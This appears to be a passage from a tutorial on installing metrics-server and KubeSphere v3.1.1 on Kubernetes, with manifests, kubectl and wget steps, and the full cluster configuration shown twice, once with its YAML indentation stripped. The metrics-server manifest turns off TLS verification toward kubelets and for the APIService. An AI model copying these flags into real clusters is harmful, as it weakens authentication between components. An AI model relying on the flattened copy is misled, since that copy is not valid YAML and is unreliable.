  verbs:
  - get
  - list
  - watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  labels:
    k8s-app: metrics-server
  name: system:metrics-server
rules:
- apiGroups:
  - ""
  resources:
  - pods
  - nodes
  - nodes/stats
  - namespaces
  - configmaps
  verbs:
  - get
  - list
  - watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  labels:
    k8s-app: metrics-server
  name: metrics-server-auth-reader
  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  labels:
    k8s-app: metrics-server
  name: metrics-server:system:auth-delegator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:auth-delegator
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  labels:
    k8s-app: metrics-server
  name: system:metrics-server
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:metrics-server
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: v1
kind: Service
metadata:
  labels:
    k8s-app: metrics-server
  name: metrics-server
  namespace: kube-system
spec:
  ports:
  - name: https
    port: 443
    protocol: TCP
    targetPort: https
  selector:
    k8s-app: metrics-server
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    k8s-app: metrics-server
  name: metrics-server
  namespace: kube-system
spec:
  selector:
    matchLabels:
      k8s-app: metrics-server
  strategy:
    rollingUpdate:
      maxUnavailable: 0
  template:
    metadata:
      labels:
        k8s-app: metrics-server
    spec:
      containers:
      - args:
        - --cert-dir=/tmp
        - --kubelet-insecure-tls
        - --secure-port=4443
        - --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
        - --kubelet-use-node-status-port
        image: registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images/metrics-server:v0.4.3
        imagePullPolicy: IfNotPresent
        livenessProbe:
          failureThreshold: 3
          httpGet:
            path: /livez
            port: https
            scheme: HTTPS
          periodSeconds: 10
        name: metrics-server
        ports:
        - containerPort: 4443
          name: https
          protocol: TCP
        readinessProbe:
          failureThreshold: 3
          httpGet:
            path: /readyz
            port: https
            scheme: HTTPS
          periodSeconds: 10
        securityContext:
          readOnlyRootFilesystem: true
          runAsNonRoot: true
          runAsUser: 1000
        volumeMounts:
        - mountPath: /tmp
          name: tmp-dir
      nodeSelector:
        kubernetes.io/os: linux
      priorityClassName: system-cluster-critical
      serviceAccountName: metrics-server
      volumes:
      - emptyDir: {}
        name: tmp-dir
---
apiVersion: apiregistration.k8s.io/v1
kind: APIService
metadata:
  labels:
    k8s-app: metrics-server
  name: v1beta1.metrics.k8s.io
spec:
  group: metrics.k8s.io
  groupPriorityMinimum: 100
  insecureSkipTLSVerify: true
  service:
    name: metrics-server
    namespace: kube-system
  version: v1beta1
  versionPriority: 100

Install and verify

#Run the installation

[root@k8s-master ~]# kubectl apply -f metrics.yaml

Verify

kubectl get pod -A

Install KubeSphere

wget https://github.com/kubesphere/ks-installer/releases/download/v3.1.1/kubesphere-installer.yaml

wget https://github.com/kubesphere/ks-installer/releases/download/v3.1.1/cluster-configuration.yaml

Run the installation

kubectl apply -f kubesphere-installer.yaml

kubectl apply -f cluster-configuration.yaml

Check the installation progress

kubectl logs -n kubesphere-system $(kubectl get pod -n kubesphere-system -l app=ks-install -o jsonpath='{.items[0].metadata.name}') -f

32127

---

apiVersion: installer.kubesphere.io/v1alpha1

kind: ClusterConfiguration

metadata:

name: ks-installer

namespace: kubesphere-system

labels:

version: v3.1.1

spec:

persistence:

storageClass: "" # If there is no default StorageClass in your cluster, you need to specify an existing StorageClass here.

authentication:

jwtSecret: "" # Keep the jwtSecret consistent with the Host Cluster. Retrieve the jwtSecret by executing "kubectl -n kubesphere-system get cm kubesphere-config -o yaml | grep -v "apiVersion" | grep jwtSecret" on the Host Cluster.

local_registry: "" # Add your private registry address if it is needed.

etcd:

monitoring: true # Enable or disable etcd monitoring dashboard installation. You have to create a Secret for etcd before you enable it.

endpointIps: 172.31.0.4 # etcd cluster EndpointIps. It can be a bunch of IPs here.

port: 2379 # etcd port.

tlsEnable: true

common:

redis:

enabled: true

openldap:

enabled: true

minioVolumeSize: 20Gi # Minio PVC size.

openldapVolumeSize: 2Gi # openldap PVC size.

redisVolumSize: 2Gi # Redis PVC size.

monitoring:

# type: external # Whether to specify the external prometheus stack, and need to modify the endpoint at the next line.

endpoint: http://prometheus-operated.kubesphere-monitoring-system.svc:9090 # Prometheus endpoint to get metrics data.

es: # Storage backend for logging, events and auditing.

# elasticsearchMasterReplicas: 1 # The total number of master nodes. Even numbers are not allowed.

# elasticsearchDataReplicas: 1 # The total number of data nodes.

elasticsearchMasterVolumeSize: 4Gi # The volume size of Elasticsearch master nodes.

elasticsearchDataVolumeSize: 20Gi # The volume size of Elasticsearch data nodes.

logMaxAge: 7 # Log retention time in built-in Elasticsearch. It is 7 days by default.

elkPrefix: logstash # The string making up index names. The index name will be formatted as ks-<elk_prefix>-log.

basicAuth:

enabled: false

username: ""

password: ""

externalElasticsearchUrl: ""

externalElasticsearchPort: ""

console:

enableMultiLogin: true # Enable or disable simultaneous logins. It allows different users to log in with the same account at the same time.

port: 30880

alerting: # (CPU: 0.1 Core, Memory: 100 MiB) It enables users to customize alerting policies to send messages to receivers in time with different time intervals and alerting levels to choose from.

enabled: true # Enable or disable the KubeSphere Alerting System.

# thanosruler:

# replicas: 1

# resources: {}

auditing: # Provide a security-relevant chronological set of records,recording the sequence of activities happening on the platform, initiated by different tenants.

enabled: true # Enable or disable the KubeSphere Auditing Log System.

devops: # (CPU: 0.47 Core, Memory: 8.6 G) Provide an out-of-the-box CI/CD system based on Jenkins, and automated workflow tools including Source-to-Image & Binary-to-Image.

enabled: true # Enable or disable the KubeSphere DevOps System.

jenkinsMemoryLim: 2Gi # Jenkins memory limit.

jenkinsMemoryReq: 1500Mi # Jenkins memory request.

jenkinsVolumeSize: 8Gi # Jenkins volume size.

jenkinsJavaOpts_Xms: 512m # The following three fields are JVM parameters.

jenkinsJavaOpts_Xmx: 512m

jenkinsJavaOpts_MaxRAM: 2g

events: # Provide a graphical web console for Kubernetes Events exporting, filtering and alerting in multi-tenant Kubernetes clusters.

enabled: true # Enable or disable the KubeSphere Events System.

ruler:

enabled: true

replicas: 2

logging: # (CPU: 57 m, Memory: 2.76 G) Flexible logging functions are provided for log query, collection and management in a unified console. Additional log collectors can be added, such as Elasticsearch, Kafka and Fluentd.

enabled: true # Enable or disable the KubeSphere Logging System.

logsidecar:

enabled: true

replicas: 2

metrics_server: # (CPU: 56 m, Memory: 44.35 MiB) It enables HPA (Horizontal Pod Autoscaler).

enabled: false # Enable or disable metrics-server.

monitoring:

storageClass: "" # If there is an independent StorageClass you need for Prometheus, you can specify it here. The default StorageClass is used by default.

# prometheusReplicas: 1 # Prometheus replicas are responsible for monitoring different segments of data source and providing high availability.

prometheusMemoryRequest: 400Mi # Prometheus request memory.

prometheusVolumeSize: 20Gi # Prometheus PVC size.

# alertmanagerReplicas: 1 # AlertManager Replicas.

multicluster:

clusterRole: none # host | member | none # You can install a solo cluster, or specify it as the Host or Member Cluster.

network:

networkpolicy: # Network policies allow network isolation within the same cluster, which means firewalls can be set up between certain instances (Pods).

# Make sure that the CNI network plugin used by the cluster supports NetworkPolicy. There are a number of CNI network plugins that support NetworkPolicy, including Calico, Cilium, Kube-router, Romana and Weave Net.

enabled: true # Enable or disable network policies.

ippool: # Use Pod IP Pools to manage the Pod network address space. Pods to be created can be assigned IP addresses from a Pod IP Pool.

type: calico # Specify "calico" for this field if Calico is used as your CNI plugin. "none" means that Pod IP Pools are disabled.

topology: # Use Service Topology to view Service-to-Service communication based on Weave Scope.

type: none # Specify "weave-scope" for this field to enable Service Topology. "none" means that Service Topology is disabled.

openpitrix: # An App Store that is accessible to all platform tenants. You can use it to manage apps across their entire lifecycle.

store:

enabled: true # Enable or disable the KubeSphere App Store.

servicemesh: # (0.3 Core, 300 MiB) Provide fine-grained traffic management, observability and tracing, and visualized traffic topology.

enabled: true # Base component (pilot). Enable or disable KubeSphere Service Mesh (Istio-based).

kubeedge: # Add edge nodes to your cluster and deploy workloads on edge nodes.

enabled: true # Enable or disable KubeEdge.

cloudCore:

nodeSelector: {"node-role.kubernetes.io/worker": ""}

tolerations: []

cloudhubPort: "10000"

cloudhubQuicPort: "10001"

cloudhubHttpsPort: "10002"

cloudstreamPort: "10003"

tunnelPort: "10004"

cloudHub:

advertiseAddress: # At least a public IP address or an IP address which can be accessed by edge nodes must be provided.

- "" # Note that once KubeEdge is enabled, CloudCore will malfunction if the address is not provided.

nodeLimit: "100"

service:

cloudhubNodePort: "30000"

cloudhubQuicNodePort: "30001"

cloudhubHttpsNodePort: "30002"

cloudstreamNodePort: "30003"

tunnelNodePort: "30004"

edgeWatcher:

nodeSelector: {"node-role.kubernetes.io/worker": ""}

tolerations: []

edgeWatcherAgent:

nodeSelector: {"node-role.kubernetes.io/worker": ""}

tolerations: []

[root@k8s-master /]# cat cluster-configuration.yaml

---
apiVersion: installer.kubesphere.io/v1alpha1
kind: ClusterConfiguration
metadata:
  name: ks-installer
  namespace: kubesphere-system
  labels:
    version: v3.1.1
spec:
  persistence:
    storageClass: "" # If there is no default StorageClass in your cluster, you need to specify an existing StorageClass here.
  authentication:
    jwtSecret: "" # Keep the jwtSecret consistent with the Host Cluster. Retrieve the jwtSecret by executing "kubectl -n kubesphere-system get cm kubesphere-config -o yaml | grep -v "apiVersion" | grep jwtSecret" on the Host Cluster.
  local_registry: "" # Add your private registry address if it is needed.
  etcd:
    monitoring: true # Enable or disable etcd monitoring dashboard installation. You have to create a Secret for etcd before you enable it.
    endpointIps: 172.24.1.50 # etcd cluster EndpointIps. It can be a bunch of IPs here.
    port: 2379 # etcd port.
    tlsEnable: true
  common:
    redis:
      enabled: true
    openldap:
      enabled: true
    minioVolumeSize: 20Gi # Minio PVC size.
    openldapVolumeSize: 2Gi # openldap PVC size.
    redisVolumSize: 2Gi # Redis PVC size.
    monitoring:
      # type: external # Whether to specify the external prometheus stack, and need to modify the endpoint at the next line.
      endpoint: http://prometheus-operated.kubesphere-monitoring-system.svc:9090 # Prometheus endpoint to get metrics data.
    es: # Storage backend for logging, events and auditing.
      # elasticsearchMasterReplicas: 1 # The total number of master nodes. Even numbers are not allowed.
      # elasticsearchDataReplicas: 1 # The total number of data nodes.
      elasticsearchMasterVolumeSize: 4Gi # The volume size of Elasticsearch master nodes.
      elasticsearchDataVolumeSize: 20Gi # The volume size of Elasticsearch data nodes.
      logMaxAge: 7 # Log retention time in built-in Elasticsearch. It is 7 days by default.
      elkPrefix: logstash # The string making up index names. The index name will be formatted as ks-<elk_prefix>-log.
      basicAuth:
        enabled: false
        username: ""
        password: ""
      externalElasticsearchUrl: ""
      externalElasticsearchPort: ""
  console:
    enableMultiLogin: true # Enable or disable simultaneous logins. It allows different users to log in with the same account at the same time.
    port: 30880
  alerting: # (CPU: 0.1 Core, Memory: 100 MiB) It enables users to customize alerting policies to send messages to receivers in time with different time intervals and alerting levels to choose from.
    enabled: true # Enable or disable the KubeSphere Alerting System.
    # thanosruler:
    #   replicas: 1
    #   resources: {}
  auditing: # Provide a security-relevant chronological set of records, recording the sequence of activities happening on the platform, initiated by different tenants.
    enabled: true # Enable or disable the KubeSphere Auditing Log System.
  devops: # (CPU: 0.47 Core, Memory: 8.6 G) Provide an out-of-the-box CI/CD system based on Jenkins, and automated workflow tools including Source-to-Image & Binary-to-Image.
    enabled: true # Enable or disable the KubeSphere DevOps System.
    jenkinsMemoryLim: 2Gi # Jenkins memory limit.
    jenkinsMemoryReq: 1500Mi # Jenkins memory request.
    jenkinsVolumeSize: 8Gi # Jenkins volume size.
    jenkinsJavaOpts_Xms: 512m # The following three fields are JVM parameters.
    jenkinsJavaOpts_Xmx: 512m
    jenkinsJavaOpts_MaxRAM: 2g
  events: # Provide a graphical web console for Kubernetes Events exporting, filtering and alerting in multi-tenant Kubernetes clusters.
    enabled: true # Enable or disable the KubeSphere Events System.
    ruler:
      enabled: true
      replicas: 2
  logging: # (CPU: 57 m, Memory: 2.76 G) Flexible logging functions are provided for log query, collection and management in a unified console. Additional log collectors can be added, such as Elasticsearch, Kafka and Fluentd.
    enabled: true # Enable or disable the KubeSphere Logging System.
    logsidecar:
      enabled: true
      replicas: 2
  metrics_server: # (CPU: 56 m, Memory: 44.35 MiB) It enables HPA (Horizontal Pod Autoscaler).
    enabled: false # Enable or disable metrics-server.
  monitoring:
    storageClass: "" # If there is an independent StorageClass you need for Prometheus, you can specify it here. The default StorageClass is used by default.
    # prometheusReplicas: 1 # Prometheus replicas are responsible for monitoring different segments of data source and providing high availability.
    prometheusMemoryRequest: 400Mi # Prometheus request memory.
    prometheusVolumeSize: 20Gi # Prometheus PVC size.
    # alertmanagerReplicas: 1 # AlertManager Replicas.
  multicluster:
    clusterRole: none # host | member | none # You can install a solo cluster, or specify it as the Host or Member Cluster.
  network:
    networkpolicy: # Network policies allow network isolation within the same cluster, which means firewalls can be set up between certain instances (Pods).
      # Make sure that the CNI network plugin used by the cluster supports NetworkPolicy. There are a number of CNI network plugins that support NetworkPolicy, including Calico, Cilium, Kube-router, Romana and Weave Net.
      enabled: true # Enable or disable network policies.
    ippool: # Use Pod IP Pools to manage the Pod network address space. Pods to be created can be assigned IP addresses from a Pod IP Pool.
      type: calico # Specify "calico" for this field if Calico is used as your CNI plugin. "none" means that Pod IP Pools are disabled.
    topology: # Use Service Topology to view Service-to-Service communication based on Weave Scope.
      type: none # Specify "weave-scope" for this field to enable Service Topology. "none" means that Service Topology is disabled.
  openpitrix: # An App Store that is accessible to all platform tenants. You can use it to manage apps across their entire lifecycle.
    store:
      enabled: true # Enable or disable the KubeSphere App Store.
  servicemesh: # (0.3 Core, 300 MiB) Provide fine-grained traffic management, observability and tracing, and visualized traffic topology.
    enabled: true # Base component (pilot). Enable or disable KubeSphere Service Mesh (Istio-based).
  kubeedge: # Add edge nodes to your cluster and deploy workloads on edge nodes.
    enabled: true # Enable or disable KubeEdge.
    cloudCore:
      nodeSelector: {"node-role.kubernetes.io/worker": ""}
      tolerations: []
      cloudhubPort: "10000"
      cloudhubQuicPort: "10001"
      cloudhubHttpsPort: "10002"
      cloudstreamPort: "10003"
      tunnelPort: "10004"
      cloudHub:
        advertiseAddress: # At least a public IP address or an IP address which can be accessed by edge nodes must be provided.
          - "" # Note that once KubeEdge is enabled, CloudCore will malfunction if the address is not provided.
        nodeLimit: "100"
      service:
        cloudhubNodePort: "30000"
        cloudhubQuicNodePort: "30001"
        cloudhubHttpsNodePort: "30002"
        cloudstreamNodePort: "30003"
        tunnelNodePort: "30004"
    edgeWatcher:
      nodeSelector: {"node-role.kubernetes.io/worker": ""}
      tolerations: []
      edgeWatcherAgent:
        nodeSelector: {"node-role.kubernetes.io/worker": ""}
        tolerations: []
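
The file is long, so after editing it, it can help to list which pluggable components are actually switched on before applying it. The sketch below is only a convenience: `list_enabled` is a hypothetical helper, not part of KubeSphere, and it assumes the file on disk uses the standard two-space indentation. It only reports components whose `enabled` flag sits directly under the component key, so nested flags such as `openpitrix.store.enabled` or `network.networkpolicy.enabled` are not listed.

```shell
#!/bin/sh
# Hypothetical helper (not part of KubeSphere): print every key directly
# under "spec" whose own "enabled" flag is true.
# Assumption: two-space indentation, so components sit at 2 spaces and
# their direct "enabled" flag at 4 spaces.
list_enabled() {
  awk '
    /^  [A-Za-z_]+:/     { comp = $1; sub(/:$/, "", comp) }  # remember the current 2-space key
    /^    enabled: true/ { print comp }                      # its direct flag is true
  ' "$1"
}

# Usage: run against the file in the current directory, if it exists.
if [ -f cluster-configuration.yaml ]; then
  list_enabled cluster-configuration.yaml
fi
```

A plain text match like this is deliberately simple; for anything beyond a quick check, a real YAML parser is the safer choice.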